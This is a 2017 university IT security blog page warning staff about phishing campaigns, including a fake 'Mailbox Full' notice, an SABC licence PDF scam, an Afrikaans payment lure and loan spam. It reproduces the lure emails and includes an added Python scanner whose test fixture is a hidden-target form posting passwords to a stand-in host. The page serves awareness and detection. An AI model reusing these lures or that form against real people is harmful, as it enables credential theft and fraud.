MAILBOX FULL phishing message

Tuesday, August 15th, 2017

A phishing email with the subject MAILBOX FULL has been sent from an internal SU staff member’s account. (See below for an example with links removed.)

Remember that spear-phishing email always appears to come from a trusted source, like a university address, and because it might seem to come from someone we know personally, the potential danger is greater. Note that even if it says Microsoft, there is no indication of branding. Official communication from IT will always be branded and look the same. Also note the multiple spelling errors and suspiciously bad language.

Do NOT click on any of the included links in the email or enter your username or password. You should never do this at any time. If you follow the link and supply your information, it will be used by phishing criminals to gain access to your bank details. 

If you have any inquiries, please let us know by logging a request on ServiceNow or calling our Service Desk at 808 4367. For more information on this and other phishing attacks, refer to our blog and Twitter account.

From: SU Staff, Mev <>
Sent: Tuesday, 15 August 2017 12:18 PM
Subject: Mailbox Full

Your mailbox is full and you have 3 mails pending. kindly increase the storage capacity of your mailbox account. Increase the storage capacity by clicking below

             storage increase

Fill out the instruction in order to increase the storage capacity to continue using your email account inorder to avoid being disconnected.

©Copyright 2017 Microsoft

All Right Reserved.

More information on current phishing attack

Monday, August 7th, 2017

The university is in the middle of a serious spear-phishing attack and is the direct target of a group of criminals who have registered and set up a South African website to fool university users into providing their e-mail addresses, usernames and passwords. 

Undoubtedly the same criminal cartel is now using e-mail accounts that were compromised in the last attack (this time a senior lecturer at Stellenbosch Campus). They registered a South African domain name and have disguised the website to look like the university’s WebMail Login page.

Spear phishing is an email-spoofing attack that targets a specific organization or individual like the university and is not typically initiated by random hackers, but by perpetrators out for financial gain. As with emails used in regular phishing expeditions, spear-phishing messages appear to come from a trusted source. This case a address. The apparent source of the email is likely to be an individual within the recipient’s own company — generally, someone in a position of authority — or from someone the target knows personally, thus its potential danger.

It is important that you do NOT click on any of the included links in the mail or enter your username or password. You should never do this at any time, as Information Technology would never ask you to do so!

Just because the mail looks legitimate and the web page *looks* like it is genuine, does not make it so.

If you have received mail that looks like this please immediately report it to the Information Technology Security Team using the following method:

Send the spam/phishing mail to

If you did click on the link of this phishing spam and unwittingly gave the scammers your username, e-mail address and password, you should immediately go to and change the passwords on ALL your university accounts (making sure the new password is completely different, and is a strong password that will not be easily guessed), as well as changing the passwords on your social media and private email accounts (especially if you use the same passwords on these accounts).

Please be careful out there. These criminals are now targeting the university, no doubt based on their past successes. Keep alert and on the lookout.

[Article by David Wiles]

Phishing email: SABC TV Licence payment request

Wednesday, July 26th, 2017

The SABC slogan goes: “Pay your TV licence. It’s the right thing to do” or something to that effect. Falling for this phishing scam will NOT be the right thing to do.

This phishing scam from the “SABC” about payment of your TV Licence is very clever, as it uses a so-called encrypted PDF to capture data like the victim’s ID Number, Passport Number or Company Registration number. Once the data is captured, it asks you for banking account details etc. to do the “payment” for a TV Licence. The data captured by the PDF is then sent to a server controlled by the criminals, who will use it to defraud the victim of their money.

This is what the phishing email looks like (with the dangerous parts removed):

From: []
Sent: Monday, 24 July 2017 13:14
To: University, Address <> <>

Subject: SABC requires you to make payment on your TV license account

Please find attached correspondence for your attention. The attachment is password protect.

The password for the attachment will be one of the following three options:
1. Your ID Number
2. Your Passport Number
3. Your Company Registration Number

Kind Regards
LettersOnline Team

The PDF attachment will ask you for a password if you open it. Do not open or enter any details on this PDF. The SABC will never send you an email with a link or attached file to demand that you pay your licence. Nor will they send an unbranded mail or one with no personalised salutation.

[Article by David Wiles]

Phishing email in Afrikaans

Wednesday, July 19th, 2017

About a year ago a new version of the ABSA Bank phishing email hit the university email server. What was new about this version was that the email was in Afrikaans. Although the Afrikaans was not perfect with some spelling and grammar mistakes, it still could have fooled many people, because of the “familiarity” component.

Stellenbosch University still uses a lot of Afrikaans as its primary official communications medium, and many automated systems like the Financial system use Afrikaans to inform users of payments etc. While there is nothing wrong with this, phishing scammers have latched onto this and are now attempting to fool people into divulging their personal details using Afrikaans in their phishing e-mails.

We were warned early this morning about an email that was originating from UCT with dangerous content, and almost immediately the UCT phishing emails started arriving.

Here is what to look out for:

Mail will arrive from a forged or compromised “UCT address” that will look like this:

From: Anna Huang []
Sent: 19 July 2017 10:53 AM
To: Recipients <>
Subject: Re: betaling aan jou rekening


Vind aangehegte betalingsbewys.


Disclaimer – University of Cape Town This e-mail is subject to UCT policies and e-mail disclaimer published on our website at or obtainable from +27 21 650 9111. If this e-mail is not related to the business of UCT, it is sent by the sender in an individual capacity. Please report security incidents or abuse via

The disclaimer from the University and the Afrikaans could fool some people if they are not careful.

The dangerous part is actually an attached HTML file (sometimes it might look like a PDF) that will present you with a login page where you will be asked to give your e-mail address and your password to “view this payment”.

The login page will look like this, in this version:

The actual server’s address is also hidden by encoding it, so to the untrained eye, nothing will look suspicious. This is a typical phishing scam, but with the “sender” coming from a neighbouring academic institution, and the language being Afrikaans, we need to be even more alert.
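An added example, not part of the original article: a minimal defender-side check for the kind of HTML attachment described above. It finds forms that collect a password, decodes the form target and reports the host the credentials would be sent to. It assumes percent-encoding is used to hide the address; the trusted host list, sample attachment and host names are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import unquote, urlsplit

# Assumption for this example: hosts that may legitimately receive logins.
TRUSTED_HOSTS = {"login.example.ac.za"}

class FormScanner(HTMLParser):
    """Collect each <form> action and whether the form has a password field."""
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.forms = []  # list of {"action": str, "password": bool}

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)  # attribute values arrive with HTML entities decoded
        if tag == "form":
            self.forms.append({"action": a.get("action") or "", "password": False})
        elif tag == "input" and self.forms and (a.get("type") or "").lower() == "password":
            self.forms[-1]["password"] = True

def decode_action(raw):
    """Undo percent-encoding, repeating (max 5 rounds) in case it was nested."""
    for _ in range(5):
        nxt = unquote(raw)
        if nxt == raw:
            break
        raw = nxt
    return raw.strip()

def scan_attachment(html_text):
    """Return one finding per password form that posts to an untrusted host.
    A form with no absolute target has an empty host and is reported too."""
    scanner = FormScanner()
    scanner.feed(html_text)
    findings = []
    for form in scanner.forms:
        if not form["password"]:
            continue
        decoded = decode_action(form["action"])
        host = (urlsplit(decoded).hostname or "").lower()
        if host not in TRUSTED_HOSTS:
            findings.append({"raw": form["action"], "decoded": decoded,
                             "host": host, "was_encoded": decoded != form["action"]})
    return findings

# Constructed sample: a "payment proof" attachment with a percent-encoded target.
SAMPLE = """<html><body><form method="post"
 action="%68%74%74%70%3A%2F%2Fcollector.example.net%2Fsave.php">
 <input type="text" name="email"><input type="password" name="pass">
</form></body></html>"""

if __name__ == "__main__":
    for finding in scan_attachment(SAMPLE):
        print(finding)
```
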

[Article by David Wiles]



Warning about DirectAxis Financial Services spam

Wednesday, July 19th, 2017

There have been reports of personnel and students getting numerous “spam” messages from DirectAxis Financial Services offering financial loans at 5% interest. This email is sent from a number of “throwaway” e-mail addresses like, Hotmail and

Some students and personnel are struggling to manage their finances and these “offers” can be very tempting.

There are usually attached PDFs with each message where the company advertises loans and abnormally low-interest rates, and although currently there is no embedded malware or links to servers where you would be asked to give your user name and password, the spammers nevertheless ask you for your ID NUMBER, Full Names, Occupation, Monthly income and Contact details, which can be used for identity theft.

Although DirectAxis is a legitimate South African microlender, in the past, their company letterhead has been forged and used by criminals to commit fraud. Secondly, this particular company has a number of charges against it by the Direct Marketing Association of South Africa for using “spam databases” to spam millions of South Africans with their adverts. This puts them in violation of the “Protection of Personal Information Act” []

Don’t be fooled by companies offering you loans at a ridiculously low interest rate. Here are some handy tips to spot frauds:

  • Any company that says it doesn’t care about your credit history has no intention of lending you money. A legitimate lending institution wants to know whether you pay your bills on time and in full. It needs some assurance that you’ll repay what you borrow.
  • Search the business’ website for an address where it legally does business. Lenders and loan brokers must be registered in the country where they conduct business.
  • One should never pay to get a personal loan. Many scammers ask borrowers to provide a prepaid debit card for insurance, collateral or fees.
  • Make sure a padlock icon appears somewhere on the web pages where you’re asked to type in personal information. Don’t override any warning saying a site’s security certificate has expired and pay attention to the URLs you click on.
  • When you find a lender online, go through the site to determine its physical location. Do they provide a street address? Even so, it may be a fake! If you don’t find any indication of their location, you should avoid the lender.
  • Some websites appear to offer different types of personal loans but aren’t actually lenders; they sell your personal information to other loan companies. Many “microlenders” merely collect your personal and financial information for other companies.
  • Don’t fall for the “Act Now” urgency plea. Many criminals give you a deadline and say their offer won’t exist tomorrow.

[Article by David Wiles]


© 2013-2017 Disclaimer: The views and opinions expressed in this page are strictly those of the page author(s) and content contributor(s). The contents of this page have not been reviewed or approved by Stellenbosch University.